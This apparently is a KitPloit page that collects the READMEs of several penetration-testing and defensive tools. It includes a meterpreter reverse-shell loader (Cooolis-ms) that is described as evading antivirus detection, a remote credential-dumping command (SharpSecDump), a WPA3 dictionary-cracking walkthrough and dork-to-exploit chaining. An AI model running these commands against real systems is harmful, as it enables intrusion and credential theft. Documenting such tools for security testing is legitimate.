Channel: KitPloit - PenTest Tools!

PwnXSS - Vulnerability XSS Scanner Exploit


A powerful XSS scanner made in python 3.7


Installing

Requirements:

  • BeautifulSoup4: pip install bs4
  • requests: pip install requests
  • python 3.7

Commands:

    git clone https://github.com/pwn0sec/PwnXSS
    chmod 755 -R PwnXSS
    cd PwnXSS
    python3 pwnxss.py --help

    Usage

    Basic usage:

    python3 pwnxss.py -u http://testphp.vulnweb.com

    Advanced usage:
    python3 pwnxss.py --help

    Main features
    • crawling all links on a website ( crawler engine )
    • POST and GET forms are supported
    • many settings that can be customized
    • Advanced error handling
    • Multiprocessing support.
    • ETC....

    Roadmap

    v0.3B:
    • Added custom options ( --proxy, --user-agent etc... )

    v0.3B Patch:
    • Added support for ( form method GET )

    v0.4B:
    • Improved error handling
    • Multiple parameters for the GET method are now supported

    v0.5 Release (Final):
    • Bug fixed
    • Cookies are now supported. (--cookie {})

    Note
    • Sorry for my bad English
    • If you run pwnxss on the win10 terminal you will get an untidy output
    • Currently it doesn't support DOM



    Go-Dork - The Fastest Dork Scanner Written In Go



    The fastest dork scanner written in Go.

    There are also various search engines supported by go-dork, including Google, Shodan, Bing, Duck, Yahoo and Ask.


    Install
    • Download a prebuilt binary from the releases page, unpack and run, or
    • If you have the Go compiler installed and configured:
    > GO111MODULE=on go get -v github.com/dwisiswant0/go-dork/...

    Usage

    Basic Usage

    Simply, go-dork can be run with:

    > go-dork -q "inurl:'...'"

    Flags
    > go-dork -h

    This will display help for the tool. Here are all the switches it supports.

    Flag              Description
    -q/--query        Search query (required)
    -e/--engine       Provide search engine (default: Google)
                      (options: Google, Shodan, Bing, Duck, Yahoo, Ask)
    -p/--page         Specify number of pages (default: 1)
    -H/--header       Pass custom header to search engine
    -x/--proxy        Use proxy to surfing
    -s/--silent       Silent mode, prints only results in output
    -nc/--no-color    Disable colored output results

    Querying
    > go-dork -q "inurl:..."

    Queries can also be input with stdin

    > cat dorks.txt | go-dork -p 5

    Defining engine

    Search engine can be changed from the available engines: Google, Shodan, Bing, Duck, Yahoo, Ask. However, if the -e flag is not defined, it will use the Google search engine by default.

    > go-dork -e bing -q ".php?id="

    This will do a search by the Bing engine.


    Pagination

    By default, go-dork selects the first page; you can customize this using the -p flag.

    > go-dork -q "intext:'jira'" -p 5

    It will search sequentially from pages 1 to 5.


    Adding Headers

    If you want to use a search filter on the Shodan engine, you can use custom headers to add cookies or other header parts.

    > go-dork -q "org:'Target' http.favicon.hash:116323821" \
    --engine shodan -H "Cookie: ..." -H "User-Agent: ..."

    Using Proxy

    A proxy can also be useful if Google or other engines respond with a Captcha.

    > go-dork -q "intitle:'BigIP'" -p 2 -x http://127.0.0.1:8989

    Chained with other tools

    If you want to chain the go-dork results with another tool, use the -s flag.

    > go-dork -q "inurl:'/secure' intext:'jira' site:org" -s | nuclei -t workflows/jira-exploitaiton-workflow.yaml

    Help & Bugs

    If you are still confused or found a bug, please open an issue. All bug reports are appreciated; some features have not been tested yet due to lack of free time.


    TODOs
    • Fixes Yahoo regexes
    • Fixes Google regexes if using custom User-Agent
    • Stopping if there's no results & page flag was set
    • DuckDuckGo next page


    Velociraptor - Endpoint Visibility and Collection Tool



    Velociraptor is a tool for collecting host based state information using Velocidex Query Language (VQL) queries.

    To learn more about Velociraptor, read the documentation on:

    https://www.velocidex.com/docs/


    Quick start

    If you want to see what Velociraptor is all about simply:

    1. Download the binary from the release page for your favorite platform (Windows/Linux/MacOS).

    2. Start the GUI

      $ velociraptor gui

    This will bring up the GUI, Frontend and a local client. You can collect artifacts from the client (which is just running on your own machine) as normal.

    Once you are ready for a full deployment, check out the various deployment options at https://www.velocidex.com/docs/getting-started


    Running Velociraptor via Docker

    To run a Velociraptor server via Docker, follow the instructions here: https://github.com/weslambert/velociraptor-docker


    Running Velociraptor locally

    Velociraptor is also useful as a local triage tool. You can create a self contained local collector using the GUI:

    1. Start the GUI as above (velociraptor gui).

    2. Select the Server Artifacts sidebar menu, then Build Collector.

    3. Select and configure the artifacts you want to collect, then select the Uploaded Files tab and download your customized collector.


    Building from source

    To build from source, make sure you have a recent Golang installed from https://golang.org/dl/ (Currently at least Go 1.14):

    $ git clone https://github.com/Velocidex/velociraptor.git
    $ cd velociraptor

    # This will build the GUI elements. You will need to have node
    # installed first. For example on Windows get it from
    # https://nodejs.org/en/download/ . You also need to have JAVA
    # installed from https://www.java.com because the js compiler
    # needs it.
    $ cd gui/static/
    $ npm install

    # If gulp is not on your path you need to run it using node:
    # node node_modules\gulp\bin\gulp.js compile
    $ gulp compile
    $ cd -

    # This builds a release (i.e. it will embed the GUI files in the
    # binary). If you don't care about the GUI a simple "make" will
    # build a bare debug binary.
    $ go run make.go -v release
    $ go run make.go -v windows

    If you want to rebuild the protobuf you will need to install protobuf compiler (This is only necessary when editing any *.proto file):

    $ wget https://github.com/protocolbuffers/protobuf/releases/download/v3.13.0/protoc-3.13.0-linux-x86_64.zip
    $ unzip protoc-3.13.0-linux-x86_64.zip
    $ sudo mv include/google/ /usr/local/include/
    $ sudo mv bin/protoc /usr/local/bin/
    $ go get -u github.com/golang/protobuf/protoc-gen-go/
    $ go install github.com/golang/protobuf/protoc-gen-go/
    $ go get -u github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway
    $ go install github.com/grpc-ecosystem/grpc-gateway/protoc-gen-grpc-gateway
    $ ./make_proto.sh

    Getting the latest version

    We have a pretty frequent release schedule but if you see a new feature submitted that you are really interested in, we would love to have more testing prior to the official release.

    We have a CI pipeline managed by GitHub actions. You can see the pipeline by clicking the actions tab on our GitHub project. There are two workflows:

    1. Windows Test: this workflow builds a minimal version of the Velociraptor binary (without the GUI) and runs all the tests on it. We also test various Windows support functions in this pipeline. This pipeline builds on every push in each PR.

    2. Linux Build All Arches: This pipeline builds complete binaries for many supported architectures. It only runs when the PR is merged into the master branch.

    If you fork the project on GitHub, the pipelines will run on your own fork as well, as long as you enable GitHub Actions on your fork. If you need to prepare a PR for a new feature or modify an existing feature, you can use this to build your own binaries for testing on all architectures before sending us the PR.


    Getting help

    Questions and feedback are welcome at velociraptor-discuss@googlegroups.com

    You can also chat with us directly on Discord: https://www.velocidex.com/discord

    File issues on https://github.com/Velocidex/velociraptor

    Read more about Velociraptor on our blog:

    https://www.velocidex.com/blog/

    Hang out on Medium https://medium.com/velociraptor-ir



    SharpSecDump - .Net Port Of The Remote SAM + LSA Secrets Dumping Functionality Of Impacket'S Secretsdump.Py



    .Net port of the remote SAM + LSA Secrets dumping functionality of impacket's secretsdump.py. By default runs in the context of the current user. Please only use in environments you own or have permission to test against :)


    Usage

    SharpSecDump.exe -target=192.168.1.15 -u=admin -p=Password123 -d=test.local

    Required Flags

    • -target - Comma separated list of IPs / hostnames to scan. Please don't include spaces between addresses. Can also dump hashes on the local system by setting target to 127.0.0.1.

    Optional Flags

    • -u - Username to use, if you want to use alternate credentials to run. Must use with -p and -d flags
    • -p - Plaintext password to use, if you want to use alternate credentials to run. Must use with -u and -d flags
    • -d - Domain to use, if you want to use alternate credentials to run (. for local domain). Must use with -u and -p flags
    • -threads - Threads to use to concurrently enumerate multiple remote hosts (Default: 10)

    Notes

    The project has been tested against Win 7,10, Server 2012, and Server 2016. Older versions (win 2003 / xp) may not work with this tool.

    By default, if you're attempting to dump hives from your local system, you'll need to be running from a high-integrity context. However, this is not necessary when targeting remote systems.

    This currently supports SAM + SECURITY registry hive dumping to retrieve cached credential data. However, it does not support NTDS.dit parsing / dcsync yet. If you're looking for dcsync functionality in a .Net project I recommend sharpkatz.

    If a system is configured to disallow RPC over TCP (RPC over named pipe is required -- this is not a default setting) there is a 21s delay before Windows will fall back to RPC/NP, but will still allow the connection. This appears to be a limitation of using API calls that leverage the SCManager to remotely bind to services.


    Credits

    This code is a port of functionality from impacket by @agsolino and pypykatz by @skelsec. All credit goes to them for the original steps to parse and decrypt info from the registry hives.

    The registry hive structures used are from gray_hat_csharp_code by @BrandonPrry.

    Finally, the original idea for the script was based on a partial port I was working on of Posh_SecModule by @Carlos_Perez, a good chunk of initial SAM parsing code came from that project.



    Wacker - A WPA3 Dictionary Cracker



    A set of scripts to help perform an online dictionary attack against a WPA3 access point. Wacker leverages the wpa_supplicant control interface to control the operations of the supplicant daemon and to get status information and event notifications, ultimately helping speed up connection attempts during brute force attempts.


    Find a WPA3 AP to use

    If you already have a WPA3 AP that works then great. In lieu of that you can set up a local environment using mac80211_hwsim (details below) or use the VMs provided by the RF Hackers Sanctuary (highly recommended). Testing was done almost exclusively using the simulated mac80211 environments. Little attention was given to a real AP... for now... so YMWV.


    Local Simulated Radios

    To set up your own software simulator of 802.11 radios simply configure and load the correct mac80211_hwsim module.

    # modprobe mac80211_hwsim radios=4
    # iwconfig
    wlan0 IEEE 802.11 ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:on

    wlan1 IEEE 802.11 ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:on

    wlan2 IEEE 802.11 ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:on

    wlan3 IEEE 802.11 ESSID:off/any
    Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm
    Retry short limit:7 RTS thr:off Fragment thr:off
    Power Management:on

    Choose one of the new interfaces as your WPA3 access point and use the following conf file.

    # cat hostapd.conf
    interface=wlan0
    ssid=WCTF_18
    driver=nl80211
    hw_mode=g
    channel=1
    logger_syslog=-1
    logger_syslog_level=3
    wpa=2
    wpa_passphrase=Aeromechanics
    wpa_key_mgmt=SAE
    rsn_pairwise=CCMP
    ieee80211w=1
    group_mgmt_cipher=AES-128-CMAC

    And start hostapd with

    # hostapd -K -dd hostapd.conf

    Split a wordlist

    If you have intentions of farming out your cracking efforts across a series of nics the provided split.sh script will partition a wordlist for you.

    # ./split.sh 10 cyberpunk.words 
    50916 cyberpunk.words.aaa
    50916 cyberpunk.words.aab
    50916 cyberpunk.words.aac
    50916 cyberpunk.words.aad
    50916 cyberpunk.words.aae
    50916 cyberpunk.words.aaf
    50916 cyberpunk.words.aag
    50916 cyberpunk.words.aah
    50916 cyberpunk.words.aai
    50907 cyberpunk.words.aaj
    509151 total

    Building wpa_supplicant

    We're providing our own wpa_supplicant in order to guarantee that certain configurations are set as well as a few mods that need to occur within the source code itself. To build simply do the following. Hopefully in the future this will become a deprecated step.

    # apt-get install -y pkg-config libnl-3-dev gcc libssl-dev libnl-genl-3-dev
    # cd wpa_supplicant-2.8/wpa_supplicant/
    # cp defconfig_brute_force .config
    # make -j4
    # ls -al wpa_supplicant
    -rwxr-xr-x 1 root root 13541416 May 31 16:30 wpa_supplicant

    Of interest are a few new event messages that were added to the wpa supplicant control interface to help further distinguish outcomes the wacker script hooks.

    /** auth success for our brute force stuff (WPA3) */
    #define WPA_EVENT_BRUTE_SUCCESS "CTRL-EVENT-BRUTE-SUCCESS "
    /** auth failure for our brute force stuff (WPA3) */
    #define WPA_EVENT_BRUTE_FAILURE "CTRL-EVENT-BRUTE-FAILURE "

    Python Requirement

    The wacker.py script makes use of a few f-strings among other python3-isms. In the interest of releasing the code sooner this requirement was kept. Here are some generic install instructions for Python3.7 if needed. I know in the future this will become a deprecated step.

    # apt-get install build-essential tk-dev libncurses5-dev libncursesw5-dev libreadline6-dev libdb5.3-dev libgdbm-dev libsqlite3-dev libssl-dev libbz2-dev libexpat1-dev liblzma-dev zlib1g-dev libffi-dev -y
    # wget https://www.python.org/ftp/python/3.7.0/Python-3.7.0.tar.xz
    # tar xf Python-3.7.0.tar.xz
    # cd Python-3.7.0
    # ./configure
    # make -j4
    # make altinstall

    Running wacker

    The wacker.py script is intended to perform all the heavy lifting.

    # ./wacker.py --help
    usage: wacker.py [-h] --wordlist WORDLIST --interface INTERFACE --bssid BSSID
    --ssid SSID --freq FREQ [--start START_WORD] [--debug]

    A WPA3 dictionary cracker. Must run as root!

    optional arguments:
    -h, --help show this help message and exit
    --wordlist WORDLIST wordlist to use
    --interface INTERFACE
    interface to use
    --bssid BSSID bssid of the target
    --ssid SSID the ssid of the WPA3 AP
    --freq FREQ frequency of the ap
    --start START_WORD word to start with in the wordlist
    --debug increase logging output

    With any luck... running the attack using just one instance...

    # ./wacker.py --wordlist cyberpunk.words --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
    Start time: 21 Aug 2020 07:40:11
    Starting wpa_supplicant...
    5795 / 509151 words (1.14%) : 79.41 words/sec : 0.020 hours lapsed : 1.76 hours to exhaust (21 Aug 2020 09:25:49)
    Found the password: 'Aeromechanics'

    Stop time: 21 Aug 2020 07:41:24

    Running multiple instances of wacker is easy if you have the spare nics. Don't forget to partition the wordlist as well.

    # ./wacker.py --wordlist cyberpunk.words.aaa --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan1 --freq 2412
    # ./wacker.py --wordlist cyberpunk.words.aab --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan2 --freq 2412
    # ./wacker.py --wordlist cyberpunk.words.aac --ssid WCTF_18 --bssid 02:00:00:00:00:00 --interface wlan3 --freq 2412

    Files of interest

    wacker is quite verbose. Files of interest are found under /tmp/wpa_supplicant/

    • wlan1 : one end of the uds
    • wlan1_client : one end of the uds
    • wlan1.conf : initial wpa_supplicant conf needed
    • wlan1.log : supplicant output (only when using --debug option)
    • wlan1.pid : pid file for the wpa_supplicant instance
    • wlan1_wacker.log : wacker debug output

    Caution

    wacker doesn't handle ACLs put in place by the target WPA3 AP. Meaning, the current code always uses the same MAC address. If the target AP blacklists our MAC address then the script won't differentiate between a true auth failure and our blacklisted MAC being rejected. This means that we'll consider the true password as a failure. One way to solve this: we would have to add macchanger to the source at the expense of slowdown.

    wacker will seemingly pause every so often as the AP will issue a backoff timeout. This will cause the metric display to seemingly pause and then start again. This is expected behavior.


    Common Problems
    • You'll see this when your client driver doesn't support the correct AKM. Typically this manifests itself in the wpa_supplicant output after you try to run the wacker script. The supplicant will essentially hang waiting for further instructions with the AKM issue detailed below. The needed AKM is 00-0F-AC:8 (SAE) in the case of WPA3.
    u631_3: WPA: AP group 0x10 network profile group 0x18; available group 0x10
    u631_3: WPA: using GTK CCMP
    u631_3: WPA: AP pairwise 0x10 network profile pairwise 0x18; available pairwise 0x10
    u631_3: WPA: using PTK CCMP
    u631_3: WPA: AP key_mgmt 0x400 network profile key_mgmt 0x400; available key_mgmt 0x400
    u631_3: WPA: Failed to select authenticated key management type
    u631_3: WPA: Failed to set WPA key management and encryption suites

    TODO
    • Create a wrapper script to launch wacker across multiple nics. This will avoid having to instantiate wacker manually for each nic. Have the wrapper also split the wordlist and consolidate the stats.


    PwnedPasswordsChecker - Search (Offline) If Your Password (NTLM Or SHA1 Format) Has Been Leaked (HIBP Passwords List V5)



    PwnedPasswordsChecker is a tool that checks if the hash of a known password (in SHA1 or NTLM format) is present in the list of I Have Been Pwned leaks and the number of occurrences.

    You can download the hash-coded version for SHA1 here or the hash-coded version for NTLM here

    Once the list is downloaded it is then necessary to convert it to binary by using my other tool HIBP PasswordList Slimmer

    This script only works with the version sorted by hash. Entry hashes must be in lowercase and preferably ordered by hash.
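Why the sorted-by-hash requirement matters, as an added example that is not PwnedPasswordsChecker's own code: with fixed-width binary records in sorted order, each lookup is a binary search instead of a scan. The record layout (20-byte raw SHA1 digest plus a 4-byte big-endian count), the function names and the sample counts are assumptions made for this sketch, not the format produced by HIBP PasswordList Slimmer.

```python
import hashlib
import struct

DIGEST_LEN = 20                    # SHA1 digest size; an NTLM list would use 16
RECORD = struct.Struct(">20sI")    # assumed layout: raw digest + big-endian count

# Constructed sample data: the counts are invented, not real HIBP figures.
SAMPLE_COUNTS = {"password": 1000, "123456": 2000, "qwerty": 300}


def sha1_hex(password):
    """Lowercase hex SHA1 of a password, as the input hash list expects."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def build_index(hex_counts):
    """Pack {hex_hash: count} into fixed-width records sorted by digest."""
    rows = sorted((bytes.fromhex(h), c) for h, c in hex_counts.items())
    return b"".join(RECORD.pack(digest, count) for digest, count in rows)


def verify_sorted(index):
    """Check the precondition: an unsorted file silently yields false negatives."""
    if len(index) % RECORD.size:
        return False
    previous = None
    for offset in range(0, len(index), RECORD.size):
        digest, _ = RECORD.unpack_from(index, offset)
        if previous is not None and digest <= previous:
            return False
        previous = digest
    return True


def lookup(index, hex_hash):
    """Binary-search the index; return the occurrence count, 0 if absent."""
    try:
        needle = bytes.fromhex(hex_hash.strip().lower())
    except ValueError:
        return 0                   # not a hex string
    if len(needle) != DIGEST_LEN:
        return 0                   # wrong hash type for this index
    lo, hi = 0, len(index) // RECORD.size
    while lo < hi:
        mid = (lo + hi) // 2
        digest, count = RECORD.unpack_from(index, mid * RECORD.size)
        if digest == needle:
            return count
        if digest < needle:
            lo = mid + 1
        else:
            hi = mid
    return 0


def check_list(index, hex_hashes):
    """Return '{hash}:{count}' lines for every input hash found in the index."""
    found = []
    for h in hex_hashes:
        count = lookup(index, h)
        if count:
            found.append(f"{h.strip().lower()}:{count}")
    return found


if __name__ == "__main__":
    idx = build_index({sha1_hex(p): c for p, c in SAMPLE_COUNTS.items()})
    assert verify_sorted(idx)
    for line in check_list(idx, [sha1_hex("password"), sha1_hex("not-leaked")]):
        print(line)
```

`lookup` only reads through `unpack_from`, so the same code works on an `mmap` of a large file without loading it into memory.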


    Usage :
    ./PwnedPasswordsChecker {InputHashList} {HashType} {OutputFile} {CompressedHIBPHashList}
    ./PwnedPasswordsChecker .\NTLM_LIST.txt NTLM .\Output.txt .\ntlm_hibp_compressed.bin

    Output format : {hash}:{occurence}


    Installation :

    Download the compiled version for Windows or Linux from release page

    If you wish to compile it yourself, you will need to have golang installed on your system and perform the following commands:

    git clone https://github.com/JoshuaMart/PwnedPasswordsChecker && cd PwnedPasswordsChecker
    go build main.go

    Screenshots

    Thanks to the use of a "compressed" format, the tool has gained considerably in performance. Example of use comparing the old version and the new one with a list of 20,000 hashes (Intel Core I7 8565U):



    Improvements

    Feel free to contact me on Twitter or do a PR to improve the script.



    Cooolis-ms - A Server That Supports The Metasploit Framework RPC



    Cooolis-ms is a server that supports Metasploit Framework RPC. It serves a Shellcode and PE loader, bypassing the static detection of anti-virus software to a certain extent, and allows the Cooolis-ms server to run separately from the Metasploit server.

    Loader execution process:

    1. connect to Cooolis-Server
    2. Cooolis-Server connects to Metasploit RPC server
    3. retrieve the payload and send it back to the loader

    Core technologies:


    Advantages of the project
    • small volume (<600KB)
    • Support all Metasploit Payload
    • Simple parameters
    • Single file
    • Support separation

    You can refer to here and write your own good projects

    How to install

    Choice 1 > Docker deployment (recommended)


    $ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
    $ cd Cooolis-ms/Docker
    $ docker-compose up -d

    Default listening port: 8899


    Choice 2 > Source code deployment
    $ git clone https://github.com/Rvn0xsy/Cooolis-ms.git
    $ cd Cooolis-ms
    $ pip3 install -r requirements.txt
    $ python3 server.py -h

    How to use

    If you are deploying with Docker, please start directly from the third step.

    Assuming this is my VPS: 10.20.56.41


    First step, start Metasploit RPC server

    Start Metasploit RPC server:

    $ msfrpcd -U msf -P msf -u /api/1.0/ -a 127.0.0.1


     

    Second step, start the Cooolis-ms server

    Make it connect to RPC and listen to a port for sending payload:

    $ python3 server.py -U msf -P msf -H 127.0.0.1 -p 55553 -s -v -l 8899 -S 10.20.56.41



    Third step, configure Metasploit listener
    msf5 > use exploit/multi/handler
    msf5 > set payload windows/meterpreter/reverse_tcp
    msf5 > set LHOST 10.20.56.41
    msf5 > set LPORT 8876
    msf5 > exploit -j



    Fourth step, start the Cooolis-ms client
    Cooolis-ms.exe -p windows/meterpreter/reverse_tcp -o LHOST=10.20.56.41,LPORT=8876,Format=dll -H 10.20.56.41 -P 8899



    Q&A : Does it support RC4 encrypted Payload?

    • windows/meterpreter/reverse_tcp_rc4:
    Cooolis-ms.exe -p windows/meterpreter/reverse_tcp_rc4 -o LHOST=10.20.56.41,LPORT=8876,RC4PASSWORD=rc4_password,Format=dll -H 10.20.56.41 -P 8899
    • windows/meterpreter_reverse_https
    Cooolis-ms.exe -p windows/meterpreter_reverse_https -o LHOST=10.20.56.41,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899
    • windows/meterpreter/bind_tcp_rc4
    Cooolis-ms.exe -p windows/meterpreter/bind_tcp_rc4 -o RHOST=10.20.56.11,LPORT=8876,LURI=/api/,Format=dll -H 10.20.56.41 -P 8899
    • Other... self-play

    Notice:

    1. The -o parameter of Cooolis-ms.exe should correspond to the msf configuration.
    2. Since this project relies on the open source project MemoryModule, it can only support PAYLOAD in DLL format. Need to add Format=dll after the -o parameter.


    NERVE - Network Exploitation, Reconnaissance & Vulnerability Engine



    NERVE is a vulnerability scanner tailored to find low-hanging fruit level vulnerabilities, in specific application configurations, network services, and unpatched services.

    It is not a replacement for Qualys, Nessus, or OpenVAS. It does not do authenticated scans, and operates in black-box mode only.

    NERVE will do "some" CVE checks, but this is primarily coming from version fingerprinting.

    Example of some of NERVE's detection capabilities:

    • Interesting Panels (Solr, Django, PHPMyAdmin, etc.)
    • Subdomain takeovers
    • Open Repositories
    • Information Disclosures
    • Abandoned / Default Web Pages
    • Misconfigurations in services (Nginx, Apache, IIS, etc.)
    • SSH Servers
    • Open Databases
    • Open Caches
    • Directory Indexing
    • Best Practices


    Features

    NERVE offers the following features:

    • Dashboard (With a Login interface)
    • REST API (Scheduling assessments, Obtaining results, etc)
    • Notifications
      • Slack
      • Email
      • Webhook
    • Reports
      • TXT
      • CSV
      • HTML
    • Customizable scans
      • Configurable intrusiveness levels
      • Scan depth
      • Exclusions
      • DNS / IP Based
      • Threading
    • Network Topology Graphs

    We put together a Graphical User Interface primarily for ease of use, but we will be putting more emphasis on detections and new signatures than on creating a full-blown user interface.


    Prerequisites

    NERVE will install all the prerequisites for you automatically if you choose the Server installation (CentOS 7.x and Ubuntu 18.x were tested) (by using install/setup.sh script). It also comes with a Dockerfile for your convenience.

    Keep in mind, NERVE requires python 3.x and libraries such as python-nmap, requests, etc. and needs root access for the initial setup.


    Installation

    Deployment Recommendation

    The best way to deploy it is to run it against your infrastructure from multiple regions (e.g. multiple instances of NERVE, in multiple countries), and toggle continuous mode so that you can catch short-lived vulnerabilities in dynamic environments/cloud.

    We typically recommend not to whitelist the IP addresses where NERVE will be initiating the scans from, to truly test your infrastructure from an attacker standpoint.

    To make NERVE fairly lightweight, there's no use of a database other than Redis.

    If you want to store your vulnerabilities long term, we recommend using the Web hook feature. At the end of each scan cycle, NERVE will dispatch a JSON payload to an endpoint of your choice, and you can then store it in a database for further analysis.

    Here are the high level steps we recommend to get the most optimal results:

    1. Deploy NERVE on 1 or more servers.
    2. Create a script that fetches your Cloud services (such as AWS Route53 to get the DNS, AWS EC2 to get the instance IPs, AWS RDS to get the database IPs, etc.) and maybe a static list of IP addresses if you have assets in a Datacenter.
    3. Call NERVE API (POST /api/scan/submit) and schedule a scan using the assets you gathered in step #2.
    4. Fetch the results programmatically and act on them (SOAR, JIRA, SIEM, etc.)
    5. Add your own logic (exclude certain alerts, add to database, etc.)

    Docker

    Clone the repository

    git clone git@github.com:PaytmLabs/nerve.git && cd nerve


    Build the Docker image

    docker build -t nerve .


    Create a container from the image

    docker run -e username="YOUR_USER" -e password="YOUR_PASSWORD" -d -p 80:8080 nerve

    In your browser, navigate to http://ip.add.re.ss:80 and log in with the credentials you specified in the previous command.


    Server

    Navigate to /opt

    cd /opt/


    Clone the repository

    git clone git@github.com:PaytmLabs/nerve.git && cd nerve


    Run Installer (requires root)

    bash install/setup.sh


    Check NERVE is running

    systemctl status nerve

    In your browser, navigate to http://ip.add.re.ss:8080 and use the credentials printed in your terminal.


    Security

    There are a few security mechanisms implemented into NERVE you need to be aware of.

    • Content Security Policy - A response header which controls where resources can be loaded from.
    • Other Security Policies - These response headers are enabled: Content-Type Options, X-XSS-Protection, X-Frame-Options, Referrer-Policy
    • Brute Force Protection - A user will get locked if more than 5 incorrect login attempts are made.
    • Cookie Protection - Cookie security flags are used, such as SameSite, HttpOnly, etc.

    If you identify a security vulnerability, please submit a bug to us on GitHub.


    Usage

    To learn about NERVE (GUI, API, etc.) we advise you to check out the documentation available to you via the platform. Once you deploy it, authenticate and on the left sidebar you will find a documentation link for API and GUI usage.


    GUI Documentation and API Documentation (images not preserved)


    Screenshots

    Login Screen, Dashboard Screen, Assessment Configuration, API Documentation, Reporting, Network Map, Vulnerability page, Log Console, HTML Report (images not preserved)




    Polypyus - Learns To Locate Functions In Raw Binaries By Extracting Known Functions From Similar Binaries



    Polypyus learns to locate functions in raw binaries by extracting known functions from similar binaries. Thus, it is a firmware historian. Polypyus works without disassembling these binaries, which is an advantage for binaries that are complex to disassemble and where common tools miss functions. In addition, the binary-only approach makes it very fast and run within a few seconds. However, this approach requires the binaries to be for the same architecture and have similar compiler options.

    Polypyus integrates into the workflow of existing tools like Ghidra, IDA, BinDiff, and Diaphora. For example, it can import previously annotated functions and learn from these, and also export found functions to be imported into IDA. Since Polypyus uses rather strict thresholds, it only found correct matches in our experiments. While this leads to fewer results than in existing tools, it is a good entry point for loading these matches into IDA to improve its auto analysis results and then run BinDiff on top.


    What Polypyus solves

    When working on raw firmware binaries, namely various Broadcom and Cypress Bluetooth firmware versions, we found that IDA auto analysis often identified function starts incorrectly. In IDA Pro 6.8 the auto analysis is a bit more aggressive, leading to more results but also more false positives. Overall, IDA Pro 7.2 was more pessimistic, but missed a lot of functions. This led to only a few BinDiff matches between our firmwares in IDA Pro 6.8 and no useful matches at all in IDA Pro 7.2.

    Interestingly, BinDiff often failed to identify functions that, except for branches, were byte-identical. Note that Polypyus searches exactly for these byte-identical functions. We assume that BinDiff fails at these functions due to a different call graph produced by missing functions and false positives. Sometimes, these functions were already recognized by IDA, but often, IDA either did not recognize these as code or did not mark them as functions. Note that Diaphora has similar problems, as it exports functions identified by IDA before further processing them.

    Moreover, while we found that Amnesia finds many functions, it also finds many false positives. However, many functions have a similar stack frame setup in the beginning. Thus, Polypyus has an option to learn common function starts from the annotated input binaries and apply this to other binaries to identify functions without matching their name. This optional step is only applied to the regions in which no functions were previously located, this way the common function starts method and the main function finding do not conflict.


    How it works

    Polypyus creates fuzzy binary matchers by comparing common functions in a collection of annotated firmware binaries.

    Currently, the following annotations are supported:

    • A WICED Studio patch.elf file, which is a special ELF file containing only symbol definitions.
    • A .symdefs file as it is produced by most ARM compilers.
    • A .csv file with a format documented in the examples.

    These annotations contain the address, size, and name of known functions. The more commonalities the input binaries in the history collection have, the better for Polypyus performance and results. Given several slightly different functions, Polypyus creates very good matchers.
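
    The matcher idea described above, as an added sketch that is not Polypyus's own code: bytes that differ between annotated copies of one function become wildcards, and the pattern is accepted in a target only when it matches exactly once. The byte strings are constructed, and the function names, the wildcard limit and the 2-byte alignment are assumptions.

```python
"""Wildcard byte matcher built from annotated copies of one function (illustrative)."""
from typing import List, Optional, Sequence

Pattern = List[Optional[int]]  # None marks a wildcard byte


def build_matcher(copies: Sequence[bytes], max_wildcard_ratio: float = 0.25) -> Optional[Pattern]:
    """Keep the bytes common to all copies; return None if the result is too fuzzy.

    The annotation supplies address and size, so every copy has the same length.
    """
    if not copies or len({len(c) for c in copies}) != 1:
        return None
    pattern: Pattern = [col[0] if len(set(col)) == 1 else None for col in zip(*copies)]
    wildcards = sum(1 for b in pattern if b is None)
    if wildcards > max_wildcard_ratio * len(pattern):
        return None  # strict threshold: no matcher is better than a loose one
    return pattern


def find_matches(pattern: Pattern, target: bytes, alignment: int = 2) -> List[int]:
    """Offsets in target where every non-wildcard byte of the pattern matches."""
    hits = []
    for off in range(0, len(target) - len(pattern) + 1, alignment):
        if all(p is None or target[off + i] == p for i, p in enumerate(pattern)):
            hits.append(off)
    return hits


def match_unique(pattern: Pattern, target: bytes) -> Optional[int]:
    """Report a function start only when the pattern is unambiguous in the target."""
    hits = find_matches(pattern, target)
    return hits[0] if len(hits) == 1 else None


# Constructed bytes: the same 10-byte function in two history binaries.
# Only byte 4 (part of a branch offset) differs between the two builds.
FUNC_IN_A = bytes.fromhex("10b500f012f8044610bd")
FUNC_IN_B = bytes.fromhex("10b500f03af8044610bd")
# Constructed target: padding, the function with yet another branch offset, padding.
TARGET = bytes.fromhex("00bf00bf" "10b500f07cf8044610bd" "7047")

if __name__ == "__main__":
    matcher = build_matcher([FUNC_IN_A, FUNC_IN_B])
    print("pattern:", ["??" if b is None else f"{b:02x}" for b in matcher])
    print("function start in target:", match_unique(matcher, TARGET))
```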


    How to install it

    Polypyus requires Python >= 3.6. We advise the use of a virtualenv for the following installation. Clone this repository and in this folder run:

    pip install .

    How to run it

    After the installation the following commands are available:

    • polypyus-gui
    • polypyus-cli

    Using Polypyus

    Polypyus is available through a graphical and a command-line interface. Both the GUI (polypyus-gui) and the CLI (polypyus-cli) take these arguments during invocation:

    --verbose sets the verbosity level. By default, only warnings are shown; -v shows info and -vv shows debug information.
    --project sets the location of the project file. This is either a file path or ":memory:".
    --help shows the help message.

    The project option lets you store your work for different contexts in different files and reopen them later.


    Using the GUI

    The general GUI workflow goes from the left-hand side of the window to the right. First, binaries are added to the history. Then, symbol annotations are added to the entries in the history. Afterward, target binaries can be added. For the matching, hit Create matchers from history. Once the matchers are created, single targets can be selected, or all targets can be matched by selecting batch match. Finally, the findings can be exported to a .csv file.

    In the following you can see a demo video where Polypyus only takes a few seconds to learn from two input binaries, annotate them, create matchers, and apply matches to a new binary.


     

    Using the CLI

